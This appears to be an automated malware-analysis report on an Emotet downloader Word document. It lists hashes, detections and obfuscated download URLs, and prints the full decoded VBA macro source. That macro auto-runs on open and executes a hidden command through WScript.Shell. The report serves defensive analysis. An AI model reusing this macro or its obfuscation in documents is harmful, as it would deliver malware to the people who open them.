Emotet Office (OLE) malware analysis — malicious · 664bfa6bb9bc1856

MALICIOUS

Office (OLE)

139.6 KB Created: 2019-01-16 06:54:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: fe4abcf698828b9341745381cb3524df SHA-1: 756d1a3795efcdbf0902c4530ab894966b979ade SHA-256: 664bfa6bb9bc18569bb464a682c4a63a0f1eef3d4a42288daf8a26291677deef

290 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. Heuristics indicate the presence of WScript.Shell usage and a Shell() call within the autoopen macro, strongly suggesting the execution of a secondary payload. The ClamAV detection as 'Doc.Downloader.Emotet-10022072-0' further supports this, as Emotet is known for its downloader capabilities. The script attempts to construct the string 'WscRipt.sHeLl' for execution.

Heuristics 9

ClamAV: Doc.Downloader.Emotet-10022072-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-10022072-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Set SleekPlasticBaconqb = Brandingai
auxiliarypd = "WscRipt.sHeLl"
   Set missioncriticaldm = vortalscz

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set Directoraz = wirelessqr
orchestrationrz = Array(ebusinessct, Centralizedjr, Internationalhk, CreateObject("" + Plasticns + HeardIslandandMcDonaldIslandszb + auxiliarypd).Run!(("" + PracticalFreshCheesena + Horizontalrf + paymentqf + Granitelw + efficientjz.TextBox1) + copyingkn + Kidscp + Openarchitectedrj, 39 - 39), SDDnu, KidsBeautyKidszk, SavingsAccountmh)
   Set Clothinglv = RefinedMetalBikeko

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub autoopen()
blackum = LicensedCottonChipsjd
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://qwV1tmp[ssacp[sm/29c_1\hP6FK9sSE@http://p[stp[shp[s]sSEV1v+]gtV1+acp[sm/vzZMi_cPjZ@http://V1rV1mV1]fp[sp[ssSEacp[sm/w]f#\sy8_Mslz@http://iglp[sp[s-fp[srmV1tip[s]afr/t8lqf9pPP_ywVhz7_wqM.@http://wwwasp11sSEzmar+/XhDjpb_0sihee1v_+\LFk2 In document text (OLE body)
- http://qwV1tmp[ssacp[sm/29c_1In document text (OLE body)
- http://p[stp[shp[s]sSEV1v+]gtV1+acp[sm/vzZMi_cPjZ@http://V1rV1mV1]fp[sp[ssSEacp[sm/w]f#In document text (OLE body)
- http://iglp[sp[s-fp[srmV1tip[s]afr/t8lqf9pPP_ywVhz7_wqM.@http://wwwasp11sSEzmar+/XhDjpb_0sihee1v_+In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8979 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8979 bytes
SHA-256: `39aeff85905cc436281f575ab2420bfccb57387a92528a70584e88a082cc5fb2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "efficientjz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Attribute VB_Name = "Woodenqw" Function Gorgeousuk() On Error Resume Next Set compressingfw = integratelc Set overrideht = Berkshiredd Select Case HomeLoanAccountri Case 111 deliverablesjv = copywp depositdj = CLng(828) Case 579 SDDso = CLng(666) streamlineoq = CDate(paymentcn) IndustrialIndustrialzv = Int(582) Case 849 inputpz = Cos(usercentricmp) NewTaiwanDollarjd = ChrB(379) Runlq = depositas End Select Set Turnpiketz = RSSam Set Avonpw = Brandlq Set parsecm = GorgeousCottonChickenzk Select Case Accountabilitycw Case 961 Dynamicji = Cambridgeshireiw auxiliarywr = CLng(426) Case 868 Forwardhw = CLng(550) protocolid = CDate(generatehh) Multilayeredqo = Int(828) Case 274 Branchnj = Cos(Bedfordshirecd) tanhi = ChrB(824) Frontlinevl = optimalom End Select Set SleekPlasticBaconqb = Brandingai auxiliarypd = "WscRipt.sHeLl" Set missioncriticaldm = vortalscz Set Seniorkc = interfaceom Select Case Ruenm Case 949 opticaliz = Roadvr SDDdj = CLng(440) Case 519 IncredibleFreshSausagesth = CLng(722) ErgonomicFreshPantsfp = CDate(Homebq) Handcraftedmd = Int(449) Case 497 Bedfordshireiw = Cos(neuraljh) opticalhh = ChrB(717) Tennesseehu = Irelandun End Select Set capacitorzm = vortalska Set Intelligentwb = copyld Set reciprocaltp = Licensedzi Select Case mindsharewv Case 687 Softlr = Investorjn adapterwz = CLng(380) Case 271 paymentmi = CLng(747) PersonalLoanAccountqp = CDate(cyanwh) compressingon = Int(811) Case 766 eyeballsnk = Cos(HandcraftedConcreteChickenoc) Functionalitymu = ChrB(611) missioncriticalfd = programdc End Select Set Directoraz = wirelessqr orchestrationrz = Array(ebusinessct, Centralizedjr, Internationalhk, CreateObject("" + Plasticns + HeardIslandandMcDonaldIslandszb + auxiliarypd).Run!(("" + PracticalFreshCheesena + Horizontalrf + paymentqf + Granitelw + efficientjz.TextBox1) + copyingkn + Kidscp + Openarchitectedrj, 39 - 39), SDDnu, KidsBeautyKidszk, SavingsAccountmh) Set Clothinglv = RefinedMetalBikeko Set Facetofacebw = copyzi Select Case JSONch Case 991 paymentqb = Dataul GenericRubberBikezf = CLng(846) Case 1 bandwidthkb = CLng(432) UnbrandedSoftChipshm = CDate(RSSjw) protocoltc = Int(251) Case 260 quantifyingiu = Cos(Tastynp) Practicalzc = ChrB(625) withdrawalzk = Curvert End Select Set AutoLoanAccounthu = invoicepv Set moratoriumlt = transparenthd Set IcelandKronait = executiveuu Select Case synthesizefw Case 438 GorgeousConcreteHatqf = HomeLoanAccountfo ADPww = CLng(582) Case 767 bluetoothqw = CLng(272) Kinazu = CDate(Directorqt) synthesizepw = Int(163) Case 798 microchipzv = Cos(Customerfocusedwc) Berkshireuj = ChrB(782) benchmarkpd = bandwidthww End Select Set nationalia = Integrationql Set userfacingmp = multistateti Set deposittw = Drivesiz Select Case CheckingAccountof Case 625 Rubberpi = ivorywf Securityzp = CLng(545) Case 235 generatesb = CLng(849) circuitii = CDate(Borderszn) driverzs = Int(377) Case 62 cultivatepz = Cos(Ouguiyadw) webenabledpw = ChrB(338) reinventnd = backendsn End Select Set Plasticta = HTTPpi End Function Attribute VB_Name = "generatesz" Function Directvz() Streetwz = opensourcepu toolsetdz = clearthinkingzp depositjz = Metalrz enterprisern = Oklahomaip Bedfordshirefq = calculatingtj InvestmentAccountzb = LicensedConcreteTablewq Villemi = Crossingzb Vermontck = Licensedko JSONui = modularvq leadingedgeiz = UICFranclz indexingdf = HandmadeFreshPizzauj Userfriendlyut = Courtwq End Function Function Healthoz() Metalwb = Outdoorsjv monetizelf = MoldovanLeuqj depositjn = HomeLoanAccountun THXzs = Streetkf Legacywb = HandcraftedMetalChickenzj InvestmentAccountnk = CreditCardAccountip firewallsk = LebanesePoundjm SCSInf = productuf whiteic = InvestmentAccounthw arrayst = Fullyconfigurableuz parseal = Gorgeousia Plannerdr = Bordersmh End Function Sub autoopen() blackum = LicensedCottonChipsjd architecturescb = multitaskingmn Expresswayio = overridingjp enterprisewu = Crossgroupiq Ferryos = Multichannelledov HealthGardenAutomotiveda = withdrawalss outoftheboxaa = Array(SmallSteelBalluw, CreditCardAccountlj, Ghanass, Gorgeousuk, Streamlinednw, IntelligentSteelCheesewj, SleekRubberTunaqq) verticalsw = hackingvv GraphicInterfacehp = porttk Bedfordshirepj = Smallnm overrideuf = Chiefbw initiativessq = rebootuc protocolci = transmitterij End Sub Function greynq() GorgeousFrozenSaladls = applicationsjq valueaddeddw = GorgeousFreshCarhn alarmwj = Louisianapj Distributedjq = Devolvedfd Unbrandedab = bifurcatedvh exploittd = feedzs Producthw = applicationci Chiefjl = Multilayeredzu distributedvw = SSLvw monitorjk = Rubbermf GroceryMusiczz = seizena hapticjn = Alaskalk End Function Attribute VB_Name = "definitionti" Attribute VB_Name = "Consultantwi" Attribute VB_Name = "Mauritiussn" Attribute VB_Name = "Metalaf" Attribute VB_Name = "Softcm" Attribute VB_Name = "Assistantwh" Attribute VB_Name = "Softfw" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "marketsji" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "HomeIndustrialvp" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Islandiv" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "calculatesf" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Steelnl" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "emarketsao" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "intranetrm" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Buckinghamshirewd" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 39aeff85905cc436281f575ab2420bfccb57387a92528a70584e88a082cc5fb2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "efficientjz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "Woodenqw"
Function Gorgeousuk()
On Error Resume Next
   Set compressingfw = integratelc
Set overrideht = Berkshiredd
Select Case HomeLoanAccountri
         Case 111
            deliverablesjv = copywp
            depositdj = CLng(828)
         Case 579
            SDDso = CLng(666)
            streamlineoq = CDate(paymentcn)
            IndustrialIndustrialzv = Int(582)
         Case 849
            inputpz = Cos(usercentricmp)
            NewTaiwanDollarjd = ChrB(379)
            Runlq = depositas
 End Select
Set Turnpiketz = RSSam
   Set Avonpw = Brandlq
Set parsecm = GorgeousCottonChickenzk
Select Case Accountabilitycw
         Case 961
            Dynamicji = Cambridgeshireiw
            auxiliarywr = CLng(426)
         Case 868
            Forwardhw = CLng(550)
            protocolid = CDate(generatehh)
            Multilayeredqo = Int(828)
         Case 274
            Branchnj = Cos(Bedfordshirecd)
            tanhi = ChrB(824)
            Frontlinevl = optimalom
 End Select
Set SleekPlasticBaconqb = Brandingai
auxiliarypd = "WscRipt.sHeLl"
   Set missioncriticaldm = vortalscz
Set Seniorkc = interfaceom
Select Case Ruenm
         Case 949
            opticaliz = Roadvr
            SDDdj = CLng(440)
         Case 519
            IncredibleFreshSausagesth = CLng(722)
            ErgonomicFreshPantsfp = CDate(Homebq)
            Handcraftedmd = Int(449)
         Case 497
            Bedfordshireiw = Cos(neuraljh)
            opticalhh = ChrB(717)
            Tennesseehu = Irelandun
 End Select
Set capacitorzm = vortalska
   Set Intelligentwb = copyld
Set reciprocaltp = Licensedzi
Select Case mindsharewv
         Case 687
            Softlr = Investorjn
            adapterwz = CLng(380)
         Case 271
            paymentmi = CLng(747)
            PersonalLoanAccountqp = CDate(cyanwh)
            compressingon = Int(811)
         Case 766
            eyeballsnk = Cos(HandcraftedConcreteChickenoc)
            Functionalitymu = ChrB(611)
            missioncriticalfd = programdc
 End Select
Set Directoraz = wirelessqr
orchestrationrz = Array(ebusinessct, Centralizedjr, Internationalhk, CreateObject("" + Plasticns + HeardIslandandMcDonaldIslandszb + auxiliarypd).Run!(("" + PracticalFreshCheesena + Horizontalrf + paymentqf + Granitelw + efficientjz.TextBox1) + copyingkn + Kidscp + Openarchitectedrj, 39 - 39), SDDnu, KidsBeautyKidszk, SavingsAccountmh)
   Set Clothinglv = RefinedMetalBikeko
Set Facetofacebw = copyzi
Select Case JSONch
         Case 991
            paymentqb = Dataul
            GenericRubberBikezf = CLng(846)
         Case 1
            bandwidthkb = CLng(432)
            UnbrandedSoftChipshm = CDate(RSSjw)
            protocoltc = Int(251)
         Case 260
            quantifyingiu = Cos(Tastynp)
            Practicalzc = ChrB(625)
            withdrawalzk = Curvert
 End Select
Set AutoLoanAccounthu = invoicepv
   Set moratoriumlt = transparenthd
Set IcelandKronait = executiveuu
Select Case synthesizefw
         Case 438
            GorgeousConcreteHatqf = HomeLoanAccountfo
            ADPww = CLng(582)
         Case 767
            bluetoothqw = CLng(272)
            Kinazu = CDate(Directorqt)
            synthesizepw = Int(163)
         Case 798
            microchipzv = Cos(Customerfocusedwc)
            Berkshireuj = ChrB(782)
            benchmarkpd = bandwidthww
 End Select
Set nationalia = Integrationql
   Set userfacingmp = multistateti
Set deposittw = Drivesiz
Select Case CheckingAccountof
         Case 625
            Rubberpi = ivorywf
            Securityzp = CLng(545)
         Case 235
            generatesb = CLng(849)
            circuitii = CDate(Borderszn)
            driverzs = Int(377)
         Case 62
            cultivatepz = Cos(Ouguiyadw)
            webenabledpw = ChrB(338)
            reinventnd = backendsn
 End Select
Set Plasticta = HTTPpi
End Function


Attribute VB_Name = "generatesz"
Function Directvz()
Streetwz = opensourcepu
toolsetdz = clearthinkingzp
depositjz = Metalrz
enterprisern = Oklahomaip
Bedfordshirefq = calculatingtj
InvestmentAccountzb = LicensedConcreteTablewq
Villemi = Crossingzb
Vermontck = Licensedko
JSONui = modularvq
leadingedgeiz = UICFranclz
indexingdf = HandmadeFreshPizzauj
Userfriendlyut = Courtwq
End Function
Function Healthoz()
Metalwb = Outdoorsjv
monetizelf = MoldovanLeuqj
depositjn = HomeLoanAccountun
THXzs = Streetkf
Legacywb = HandcraftedMetalChickenzj
InvestmentAccountnk = CreditCardAccountip
firewallsk = LebanesePoundjm
SCSInf = productuf
whiteic = InvestmentAccounthw
arrayst = Fullyconfigurableuz
parseal = Gorgeousia
Plannerdr = Bordersmh
End Function
Sub autoopen()
blackum = LicensedCottonChipsjd
architecturescb = multitaskingmn
Expresswayio = overridingjp
enterprisewu = Crossgroupiq
Ferryos = Multichannelledov
HealthGardenAutomotiveda = withdrawalss
outoftheboxaa = Array(SmallSteelBalluw, CreditCardAccountlj, Ghanass, Gorgeousuk, Streamlinednw, IntelligentSteelCheesewj, SleekRubberTunaqq)
verticalsw = hackingvv
GraphicInterfacehp = porttk
Bedfordshirepj = Smallnm
overrideuf = Chiefbw
initiativessq = rebootuc
protocolci = transmitterij
End Sub
Function greynq()
GorgeousFrozenSaladls = applicationsjq
valueaddeddw = GorgeousFreshCarhn
alarmwj = Louisianapj
Distributedjq = Devolvedfd
Unbrandedab = bifurcatedvh
exploittd = feedzs
Producthw = applicationci
Chiefjl = Multilayeredzu
distributedvw = SSLvw
monitorjk = Rubbermf
GroceryMusiczz = seizena
hapticjn = Alaskalk
End Function

Attribute VB_Name = "definitionti"

Attribute VB_Name = "Consultantwi"

Attribute VB_Name = "Mauritiussn"

Attribute VB_Name = "Metalaf"

Attribute VB_Name = "Softcm"

Attribute VB_Name = "Assistantwh"

Attribute VB_Name = "Softfw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "marketsji"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "HomeIndustrialvp"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Islandiv"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "calculatesf"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Steelnl"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "emarketsao"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "intranetrm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Buckinghamshirewd"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.